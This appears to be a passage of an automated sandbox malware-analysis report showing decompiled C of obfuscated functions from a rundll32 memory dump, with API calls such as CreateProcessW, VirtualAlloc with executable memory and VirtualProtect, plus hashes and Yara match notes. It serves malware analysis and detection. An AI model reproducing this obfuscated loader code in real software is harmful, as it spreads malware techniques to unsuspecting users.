Function 002089F6, Relevance: 1.4, Strings: 1, Instructions: 178
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E002089F6(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _t179;
				void* _t198;
				void* _t199;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				intOrPtr _t230;
				signed int _t233;
				intOrPtr* _t236;
				void* _t237;

				_t236 = _t237 - 0x58;
				_push( *((intOrPtr*)(_t236 + 0x7c)));
				_t230 =  *((intOrPtr*)(_t236 + 0x60));
				_push( *((intOrPtr*)(_t236 + 0x78)));
				_push( *((intOrPtr*)(_t236 + 0x74)));
				_push(0);
				_push( *((intOrPtr*)(_t236 + 0x6c)));
				_push( *((intOrPtr*)(_t236 + 0x68)));
				_push( *((intOrPtr*)(_t236 + 0x64)));
				_push(_t230);
				_push(__edx);
				_t179 = E001F56B2(0);
				 *((intOrPtr*)(_t236 + 0x10)) = _t179;
				 *((intOrPtr*)(_t236 + 0x14)) = _t179;
				 *((intOrPtr*)(_t236 + 0xc)) = 0x631fbb;
				 *(_t236 + 0x18) = 0xabd8;
				 *(_t236 + 0x18) =  *(_t236 + 0x18) >> 0xa;
				 *(_t236 + 0x18) =  *(_t236 + 0x18) ^ 0x000028bc;
				 *(_t236 + 0x50) = 0x6039;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) >> 3;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) + 0xffff0189;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) | 0x7d810f7b;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) ^ 0xffff162f;
				 *(_t236 + 0x28) = 0x1c47;
				 *(_t236 + 0x28) =  *(_t236 + 0x28) >> 0xc;
				 *(_t236 + 0x28) =  *(_t236 + 0x28) ^ 0x0000518a;
				 *(_t236 + 0x54) = 0x88f7;
				_t204 = 0x7a;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) / _t204;
				_t205 = 0x2f;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) / _t205;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) | 0x955efb45;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) ^ 0x955eaba7;
				 *(_t236 + 0x34) = 0x5d88;
				 *(_t236 + 0x34) =  *(_t236 + 0x34) | 0x01d5b93d;
				 *(_t236 + 0x34) =  *(_t236 + 0x34) + 0xffff1061;
				 *(_t236 + 0x34) =  *(_t236 + 0x34) ^ 0x01d50dda;
				 *(_t236 + 0x20) = 0xe64c;
				_t206 = 0x3c;
				 *(_t236 + 0x20) =  *(_t236 + 0x20) * 0x1a;
				 *(_t236 + 0x20) =  *(_t236 + 0x20) ^ 0x00172033;
				 *(_t236 + 0x48) = 0x78d;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) >> 5;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) >> 3;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) << 7;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) ^ 0x00004d2d;
				 *(_t236 + 0x40) = 0xdd42;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) | 0x71435ab3;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) >> 3;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) >> 3;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) ^ 0x01c527a4;
				 *(_t236 + 0x1c) = 0xfe37;
				 *(_t236 + 0x1c) =  *(_t236 + 0x1c) / _t206;
				 *(_t236 + 0x1c) =  *(_t236 + 0x1c) ^ 0x00000b23;
				 *(_t236 + 0x44) = 0x813f;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) + 0x228;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) + 0xffff0885;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) ^ 0xc0b9d21a;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) ^ 0x3f462949;
				 *(_t236 + 0x30) = 0xaa8;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) + 0xffffc1ea;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) + 0xcc5a;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) ^ 0x0000b9ca;
				 *(_t236 + 0x4c) = 0xb208;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) * 0x21;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) ^ 0x1e109f47;
				_t233 = 0x44;
				_t207 = 0x22;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) * 0xb;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) ^ 0x4a46f378;
				 *(_t236 + 0x24) = 0x5fb2;
				 *(_t236 + 0x24) =  *(_t236 + 0x24) >> 6;
				 *(_t236 + 0x24) =  *(_t236 + 0x24) ^ 0x00007116;
				 *(_t236 + 0x2c) = 0x59ee;
				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) << 0xb;
				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) / _t233;
				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) ^ 0x000a9b68;
				 *(_t236 + 0x38) = 0x60ae;
				 *(_t236 + 0x38) =  *(_t236 + 0x38) / _t207;
				 *(_t236 + 0x38) =  *(_t236 + 0x38) << 1;
				 *(_t236 + 0x38) =  *(_t236 + 0x38) ^ 0x00001475;
				 *(_t236 + 0x3c) = 0x510d;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) << 0xb;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) | 0x23cc3b8a;
				_t208 = 0x4c;
				_t149 = _t236 - 0x48; // 0xfffec844
				_t209 = _t149;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) / _t208;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) ^ 0x0078f0f6;
				E001F1CB3(_t149,  *(_t236 + 0x18), _t233,  *(_t236 + 0x50));
				 *(_t236 - 0x48) = _t233;
				_t156 = _t236 - 4; // 0xfffec888
				_t158 = _t236 - 0x48; // 0xfffec844
				_t198 = E0020F2F9( *(_t236 + 0x28), _t149,  *((intOrPtr*)(_t236 + 0x64)),  *((intOrPtr*)(_t236 + 0x74)),  *((intOrPtr*)(_t236 + 0x78)), _t158,  *(_t236 + 0x54),  *(_t236 + 0x34), _t209,  *(_t236 + 0x20),  *(_t236 + 0x48),  *(_t236 + 0x40), _t209, _t209, _t156); // executed
				if(_t198 == 0) {
					_t199 = 0;
				} else {
					if(_t230 == 0) {
						E001F78F0( *((intOrPtr*)(_t236 - 4)),  *(_t236 + 0x1c),  *(_t236 + 0x44),  *(_t236 + 0x30),  *(_t236 + 0x4c));
						E001F78F0( *_t236,  *(_t236 + 0x24),  *(_t236 + 0x2c),  *(_t236 + 0x38),  *(_t236 + 0x3c));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t199 = 1;
				}
				return _t199;
			}

0x002089f7
0x00208a03
0x00208a06
0x00208a0b
0x00208a0e
0x00208a11
0x00208a12
0x00208a15
0x00208a18
0x00208a1b
0x00208a1c
0x00208a1e
0x00208a23
0x00208a28
0x00208a2b
0x00208a32
0x00208a39
0x00208a3d
0x00208a44
0x00208a4b
0x00208a4f
0x00208a56
0x00208a5d
0x00208a64
0x00208a6b
0x00208a6f
0x00208a76
0x00208a82
0x00208a87
0x00208a8f
0x00208a94
0x00208a99
0x00208aa0
0x00208aa7
0x00208aae
0x00208ab5
0x00208abc
0x00208ac3
0x00208ace
0x00208acf
0x00208ad2
0x00208ad9
0x00208ae0
0x00208ae4
0x00208ae8
0x00208aec
0x00208af3
0x00208afa
0x00208b01
0x00208b05
0x00208b09
0x00208b10
0x00208b1c
0x00208b1f
0x00208b26
0x00208b2d
0x00208b34
0x00208b3b
0x00208b42
0x00208b49
0x00208b50
0x00208b57
0x00208b5e
0x00208b65
0x00208b70
0x00208b75
0x00208b82
0x00208b85
0x00208b86
0x00208b89
0x00208b90
0x00208b97
0x00208b9b
0x00208ba2
0x00208ba9
0x00208bb4
0x00208bb7
0x00208bbe
0x00208bcc
0x00208bd1
0x00208bd4
0x00208bdb
0x00208be2
0x00208be6
0x00208bf0
0x00208bf3
0x00208bf3
0x00208bf6
0x00208bf9
0x00208c07
0x00208c0f
0x00208c12
0x00208c1b
0x00208c39
0x00208c43
0x00208c82
0x00208c45
0x00208c47
0x00208c64
0x00208c78
0x00208c49
0x00208c4c
0x00208c4d
0x00208c4e
0x00208c4f
0x00208c4f
0x00208c52
0x00208c52
0x00208c8a

Strings

I)F?, xrefs: 00208B42

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: I)F?
API String ID: 963392458-3766579322
Opcode ID: 9f0cb1b32e5b959dd6c64c6faedf6d3f6da1e1247f9cda7a21d2f129803ffcb6
Instruction ID: 52c85f326a3dca11b511c96c9ace8b8bb54a37f34f109c14e924677de194372c
Opcode Fuzzy Hash: 9f0cb1b32e5b959dd6c64c6faedf6d3f6da1e1247f9cda7a21d2f129803ffcb6
Instruction Fuzzy Hash: C781DF7250064CEBEF59CF65C9498CA3BB2FF44348F009219FE15962A0D7BA9999CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00253928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 002539C2
VirtualAlloc.KERNELBASE(00000000,00256CB4,00001000,00000040), ref: 00253A8E

Strings

|l%, xrefs: 00253961
trty55345, xrefs: 002539BD

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|l%
API String ID: 2643768156-3476196463
Opcode ID: 549c14c51799bbfd3dfe5079081aa34ec1bcfb7c10cb3253ddb90ca131de0079
Instruction ID: 66c771c5947a746558bba51be0e677c3db8778af0824475428fe155a71e4c708
Opcode Fuzzy Hash: 549c14c51799bbfd3dfe5079081aa34ec1bcfb7c10cb3253ddb90ca131de0079
Instruction Fuzzy Hash: 426188706153059FE780DF28FD8EB1937A2F71835BB80825AE5898B271DB72A954CF0C

Uniqueness

Uniqueness Score: -1.00%

Function 00251638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003D428,00000000,00000000), ref: 00251686

Strings

Link, xrefs: 00251666

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: 3da2ec166b451d628357d6e7636dbd1f5bfa2f4cede5890d6d81d80f487d46fc
Instruction ID: ca615b75a2a65e71ef82d2314275d5d64a16d32ffee979aedc99e3f2c1c6eb9b
Opcode Fuzzy Hash: 3da2ec166b451d628357d6e7636dbd1f5bfa2f4cede5890d6d81d80f487d46fc
Instruction Fuzzy Hash: 27119E70610744AFC720EB749D82B5E77E8AF15700F901824F910DBA92EB36FA298B59

Uniqueness

Uniqueness Score: -1.00%

Function 002B0540, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 002B058F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 002B07D9

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: bb55d789ccc9825b2cd5a41cc9d5081f4e7e05648f01f01f90527ba019213f51
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 7CC1B9B4A10209DFCB48CF88C590EAEB7B5BF88344F248159E919AB351D735EE52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00251A14, Relevance: 3.1, APIs: 2, Instructions: 56
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00251AC8: DdeFreeStringHandle.USER32(?,?), ref: 00251AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 00251A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00251A95

Memory Dump Source

Source File: 00000007.00000002.2091670626.0000000000214000.00000020.00020000.sdmp, Offset: 00214000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_214000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: 07d400a9874c6117f0517d375eb73c7c29835cbe3866addfaaf8ba99710795e6
Instruction ID: 25790b8df925f0ad0b1520ad92f09ae3cc4808b1732bc2e239f36e6cf72caa0c
Opcode Fuzzy Hash: 07d400a9874c6117f0517d375eb73c7c29835cbe3866addfaaf8ba99710795e6
Instruction Fuzzy Hash: 1F115E317212586BDB12FFA4CC82A6E37ACAF49B40B5105A0FE00DB246DB70ED158798

Uniqueness

Uniqueness Score: -1.00%

Function 002B0020, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 002B00A4

Strings

VirtualAlloc, xrefs: 002B0089, 002B008C

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: 754c78a4ba33c275e9d900c5c0119ad5d334e03b19a90916b2987e02921a2c7e
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: CA11E260D082CDDEEF01D7E894497FFBFB55F11704F044098D6446B282D6BA57588BB6

Uniqueness

Uniqueness Score: -1.00%

Function 0020F2F9, Relevance: 1.6, APIs: 1, Instructions: 72
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 30%

			E0020F2F9(void* __edx, WCHAR* _a8, WCHAR* _a12, int _a16, struct _STARTUPINFOW* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t64;
				signed int _t65;

				_push(_a56);
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E001F56B2(_t54);
				_v28 = 0x170c99;
				_v24 = 0;
				_v16 = 0x438d;
				_v16 = _v16 ^ 0x1c0fc040;
				_v16 = _v16 + 0xffffa13b;
				_v16 = _v16 ^ 0x1c0f1065;
				_v8 = 0x7b12;
				_v8 = _v8 + 0xe48b;
				_v8 = _v8 << 2;
				_t65 = 0x70;
				_push(0xf9b1620b);
				_v8 = _v8 * 0x77;
				_v8 = _v8 ^ 0x028dd8b4;
				_v20 = 0x8aa6;
				_v20 = _v20 + 0x376a;
				_v20 = _v20 ^ 0x0000ade9;
				_v12 = 0x19;
				_push(0x90aa198d);
				_v12 = _v12 / _t65;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x00005708;
				E002004D5(0x2ee, _v12 % _t65);
				_t64 = CreateProcessW(_a8, _a12, 0, 0, _a16, 0, 0, 0, _a20, _a56); // executed
				return _t64;
			}

0x0020f300
0x0020f305
0x0020f306
0x0020f307
0x0020f30a
0x0020f30d
0x0020f310
0x0020f311
0x0020f314
0x0020f317
0x0020f31a
0x0020f31d
0x0020f320
0x0020f323
0x0020f325
0x0020f326
0x0020f32b
0x0020f335
0x0020f33a
0x0020f341
0x0020f348
0x0020f34f
0x0020f356
0x0020f35d
0x0020f364
0x0020f36e
0x0020f36f
0x0020f377
0x0020f37a
0x0020f381
0x0020f388
0x0020f38f
0x0020f396
0x0020f3a2
0x0020f3a7
0x0020f3af
0x0020f3b3
0x0020f3c6
0x0020f3e2
0x0020f3e8

APIs

CreateProcessW.KERNEL32(1C0F1065,0000ADE9,00000000,00000000,?,00000000,00000000,00000000,00170C99,?), ref: 0020F3E2

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 026aef61d0656430dbbcca425602156f2ab332a660c9be10ca3ab0af62cf9408
Instruction ID: e11e13f295cbbba36c858142bade9742598e233c6ebf4bd916e4acf2e6a44541
Opcode Fuzzy Hash: 026aef61d0656430dbbcca425602156f2ab332a660c9be10ca3ab0af62cf9408
Instruction Fuzzy Hash: 2A31E072901218FBDF11DEA5C90A8DFBFB5FF08364F108188F91866260D3768A64EF90

Uniqueness

Uniqueness Score: -1.00%

Function 001F1D54, Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 001F1E0C

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 7893705023e0342a7cd03c01fb48380ada36fa37b15ddf495c5e823a11f917f8
Instruction ID: 3cd12e2d5e207e5fce67c49d26d3a792277537fdf79ad443b2968764e857093d
Opcode Fuzzy Hash: 7893705023e0342a7cd03c01fb48380ada36fa37b15ddf495c5e823a11f917f8
Instruction Fuzzy Hash: 91213371C01218BBDF019FE4CC4A8EEBFB4FB05318F108088E914622A0D3795A20DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001FCD27, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E001FCD27() {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _t48;

				_v20 = 0x9362;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0x3ac5;
				_v20 = _v20 ^ 0x0004a93d;
				_v16 = 0x2d14;
				_v16 = _v16 | 0xd3f48c41;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x069fac5e;
				_v12 = 0xc5b1;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0x469c37c1;
				_t48 = 0x70;
				_push(0xf9b1620b);
				_v12 = _v12 / _t48;
				_v12 = _v12 ^ 0x00a22cf4;
				_v8 = 0x5bb6;
				_v8 = _v8 >> 4;
				_v8 = _v8 | 0x6c69259f;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0000087c;
				_push(0xa43506f8);
				E002004D5(0x16b, _v12 % _t48);
				ExitProcess(0);
			}

0x001fcd2d
0x001fcd36
0x001fcd3a
0x001fcd41
0x001fcd48
0x001fcd4f
0x001fcd56
0x001fcd5a
0x001fcd61
0x001fcd68
0x001fcd6c
0x001fcd78
0x001fcd7b
0x001fcd80
0x001fcd86
0x001fcd92
0x001fcd99
0x001fcd9d
0x001fcda4
0x001fcda8
0x001fcdbb
0x001fcdc0
0x001fcdca

APIs

ExitProcess.KERNEL32(00000000), ref: 001FCDCA

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2e9f4816a751cc7b3e2e4233dde82b2bf974ba370e125a65ab7361591f6c0db6
Instruction ID: e06a326820d01ef2600349e266b1eb2f334d153d050f693171aa72b91290ce56
Opcode Fuzzy Hash: 2e9f4816a751cc7b3e2e4233dde82b2bf974ba370e125a65ab7361591f6c0db6
Instruction Fuzzy Hash: B7112771D0060CEBEB48DFE8C84A69EBBB0FB00708F108599D526A7294C3B51B58DF81

Uniqueness

Uniqueness Score: -1.00%

Function 001FD867, Relevance: 1.3, APIs: 1, Instructions: 44
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E001FD867(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t32;
				int _t39;
				void* _t41;
				WCHAR* _t43;

				_push(_a16);
				_t43 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t32);
				_v20 = 0xc112;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00187660;
				_v16 = 0x44a2;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x44a20c46;
				_v8 = 0x80d5;
				_v8 = _v8 << 6;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x406aec0c;
				_v12 = 0x3c7d;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x000035cf;
				_push(0xf9b1620b);
				_push(0x903a0366);
				_t41 = 0x28;
				E002004D5(_t41, __edx);
				_t39 = lstrcmpiW(_a4, _t43); // executed
				return _t39;
			}

0x001fd86e
0x001fd871
0x001fd873
0x001fd876
0x001fd879
0x001fd87c
0x001fd87d
0x001fd87e
0x001fd883
0x001fd88d
0x001fd891
0x001fd898
0x001fd89f
0x001fd8a3
0x001fd8aa
0x001fd8b1
0x001fd8b5
0x001fd8b9
0x001fd8c0
0x001fd8c7
0x001fd8cb
0x001fd8de
0x001fd8e6
0x001fd8ed
0x001fd8ee
0x001fd8fa
0x001fd900

APIs

lstrcmpiW.KERNELBASE(000035CF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001FD8FA

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 5112a81a2239dc82ca800b34fc2509730bf944e1d5fe2a59776ea9b54c5e6d15
Instruction ID: 9a3b2bca133dc70e4c1e091380f86dc7ddeff598622628567ae4e361e0c59610
Opcode Fuzzy Hash: 5112a81a2239dc82ca800b34fc2509730bf944e1d5fe2a59776ea9b54c5e6d15
Instruction Fuzzy Hash: 8311F372C0121CBBEF51EFE4C90A8DEBBB5FB04358F108598E92566251D7B58B24DF81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001FDC2F, Relevance: 43.6, Strings: 34, Instructions: 1094
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E001FDC2F() {
				char _v68;
				intOrPtr _v72;
				char _v80;
				char _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				unsigned int _v180;
				unsigned int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				unsigned int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				unsigned int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				unsigned int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				unsigned int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				unsigned int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				unsigned int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				unsigned int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				unsigned int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr _t1166;
				intOrPtr _t1180;
				intOrPtr _t1220;
				intOrPtr _t1265;
				void* _t1272;
				void* _t1277;
				intOrPtr _t1278;
				intOrPtr _t1284;
				signed int _t1286;
				signed int _t1287;
				signed int _t1299;
				signed int _t1310;
				signed int _t1316;
				signed int _t1391;
				signed int _t1392;
				void* _t1397;
				signed int _t1399;
				signed int _t1400;
				signed int _t1401;
				signed int _t1402;
				signed int _t1403;
				signed int _t1404;
				signed int _t1405;
				signed int _t1406;
				signed int _t1407;
				signed int _t1408;
				signed int _t1409;
				signed int _t1410;
				signed int _t1411;
				signed int _t1412;
				signed int _t1413;
				signed int _t1414;
				signed int _t1415;
				signed int _t1416;
				signed int _t1417;
				signed int _t1418;
				signed int _t1419;
				signed int _t1424;
				signed int _t1428;
				void* _t1430;
				void* _t1431;
				void* _t1433;
				void* _t1434;
				void* _t1435;

				_t1430 = (_t1428 & 0xfffffff8) - 0x268;
				_v240 = 0xe54f;
				_v240 = _v240 << 1;
				_t1290 = 0x24211e99;
				_v240 = _v240 ^ 0x0001b603;
				_v400 = 0x34e4;
				_v400 = _v400 | 0x72f16b66;
				_v400 = _v400 ^ 0x4462d2ae;
				_v400 = _v400 ^ 0x36938c8e;
				_v616 = 0x6c80;
				_t1399 = 0x17;
				_v616 = _v616 / _t1399;
				_v616 = _v616 >> 0xa;
				_v616 = _v616 | 0xcaff16ad;
				_v616 = _v616 ^ 0xcaff08c2;
				_v408 = 0xd461;
				_v408 = _v408 + 0xffffc650;
				_v408 = _v408 | 0x218aa682;
				_v408 = _v408 ^ 0x218ad511;
				_v260 = 0x8324;
				_v260 = _v260 | 0xdae16db7;
				_v260 = _v260 ^ 0xdae19d23;
				_v520 = 0x4c7d;
				_v520 = _v520 + 0x6bb7;
				_v520 = _v520 << 8;
				_v520 = _v520 + 0xffffc4e4;
				_v520 = _v520 ^ 0x00b7ac0f;
				_v412 = 0xf31b;
				_v412 = _v412 << 4;
				_v412 = _v412 ^ 0x6d93368f;
				_v412 = _v412 ^ 0x6d9c5e6e;
				_v156 = 0xec47;
				_t1400 = 0x68;
				_v156 = _v156 / _t1400;
				_v156 = _v156 ^ 0x000075fd;
				_v324 = 0x34f8;
